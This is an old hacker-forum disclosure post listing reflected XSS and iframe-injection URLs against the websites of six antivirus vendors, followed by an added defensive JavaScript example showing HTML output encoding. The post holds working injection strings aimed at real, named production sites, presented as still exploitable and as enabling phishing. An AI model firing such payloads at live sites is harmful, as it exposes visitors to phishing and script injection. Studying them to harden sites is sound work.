


Vulnerabilities in Websites of 6 Antivirus Vendors enable Phishing Attacks



Symantec vs Kaspersky vs Eset-(Nod32) vs AVG vs F-secure vs Trendmicro

Hehe... I know, someone is bored. We have found several bugs in the past few months, always on the same websites.

So are they still vulnerable, and are people still under threat? No doubt!

Symantec.com - XSS (IE only)

Code:
https://www.symantec.com/connect/endpoint-management-virtualization/forums}"><script>alert(String.fromCharCode(88,83,83))</script>?sym="><script>alert(String.fromCharCode(88,83,83))</script>

http://img14.imageshack.us/img14/6118/95016577.jpg

Altiris.com - XSS and iframe injection in the search module

Why Altiris? Look at this:
http://img14.imageshack.us/img14/9207/26362020.jpg

Code:
https://kb.altiris.com/display/1n/index.asp?c=&cpc=&cid=&cat=&catURL=&r=0.94508

http://img141.imageshack.us/img141/4982/89773256.jpg

http://img141.imageshack.us/img141/5645/90990231.jpg
Proof of concept :)
Search string:
Code:
"<iframe src=http://kaspersky.com'><BR><BR><IFRAME width='100%' height='600px' src='http://kaspersky.com/200'>


WARNING: This is a proof of concept that proves an XSS bug in the altiris.com website.


What about this?
http://img141.imageshack.us/img141/9535/97476447.jpg

Kaspersky - XSS & Iframe Injection

Code:
https://support.kaspersky.com/en/PersonalCabinet3/Registration/Form/?"><script>alert(12157312.477)</script>

http://img19.imageshack.us/img19/6135/60156390.jpg

Code:
http://support.kaspersky.ru/virlab/helpdesk.html?'"></title><script>alert(1337)</script>><marquee><h1>XSS</h1></marquee>

http://img19.imageshack.us/img19/6545/42343404.jpg

Code:
http://support.kaspersky.ru/virlab/helpdesk.html?'"><iframe src=http://support.kaspersky.ru

http://img9.imageshack.us/img9/4616/25204393.gif

Redirecting to another website also works fine.

Linkscanner.avg.com - Critical XSS

http://img14.imageshack.us/img14/2204/17343281.jpg

Eset.co.il - Iframe Injection

Code:
http://www.eset.co.il/home/doc.aspx?mCatID=9904&rgid=151&strSearch="<iframe src=http://symantec.com><BR><BR><IFRAME width='100%' height='600px' src='http://symantec.com/200'>

http://img528.imageshack.us/img528/7952/42032489.jpg

F-secure.com - XSS & Iframe Injection by Vektor

Vulnerable Page
Code:
http://www.f-secure.com/en_EMEA/about-us/contact-us/feedback/

http://img18.imageshack.us/img18/651/38893606.jpg
http://img155.imageshack.us/img155/6127/fgoogle.gif

WARNING: This is a proof of concept that proves an XSS bug in the F-Secure website.


Trendmicro.com - XSS & Iframe Injection

Vulnerable page:
Code:
http://trendmicro.mediaroom.com/index.php?s="><script>alert(String.fromCharCode(88,83,83))</script>

http://img10.imageshack.us/img10/9504/trendp.gif
XSS and iframe injection in the search module.
Warning! This is only a proof of concept, so we will not be responsible for any damage.

Update


Submitted by [-TE-]-Methodman
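
The search strings above all begin by closing a quoted attribute and then opening a new tag. As an added example (not part of the original post and not any vendor's code), the constructed renderer below assumes the search term is reflected into a double-quoted attribute and into body text, and shows the raw concatenation beside an output-encoded version; `escapeHtml`, `renderSearchUnsafe`, `renderSearchSafe` and `injectedTags` are hypothetical names.

```javascript
// Added example: constructed search-results renderer, not any vendor's code.
// Assumption: the search term is echoed into a double-quoted attribute
// and into body text, as the `">` prefix of the posted strings suggests.

// Encode the five characters that let text leave a text node or quoted attribute.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable form: the query value is concatenated into markup unchanged.
function renderSearchUnsafe(term) {
  return '<input name="s" value="' + term + '">\n<p>Results for ' + term + '</p>';
}

// Hardened form: same markup, every reflected value encoded at output time.
function renderSearchSafe(term) {
  const t = escapeHtml(term);
  return '<input name="s" value="' + t + '">\n<p>Results for ' + t + '</p>';
}

// Regression check: list any opening tags the template itself does not emit.
function injectedTags(html) {
  const allowed = new Set(['input', 'p']);
  const found = [];
  const re = /<\s*([a-zA-Z][a-zA-Z0-9]*)/g;
  let m;
  while ((m = re.exec(html)) !== null) {
    const name = m[1].toLowerCase();
    if (!allowed.has(name)) found.push(name);
  }
  return found;
}

// Search strings quoted in the post, used here as test input.
const samples = [
  '"><script>alert(String.fromCharCode(88,83,83))</script>',
  "\"<iframe src=http://kaspersky.com'><BR><BR><IFRAME width='100%' height='600px' src='http://kaspersky.com/200'>",
];

for (const s of samples) {
  console.log('unsafe:', injectedTags(renderSearchUnsafe(s)));
  console.log('safe:  ', injectedTags(renderSearchSafe(s)));
}
```

A check like `injectedTags` fits in a template regression test, so a search module that stops encoding its reflected input fails the build rather than shipping.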

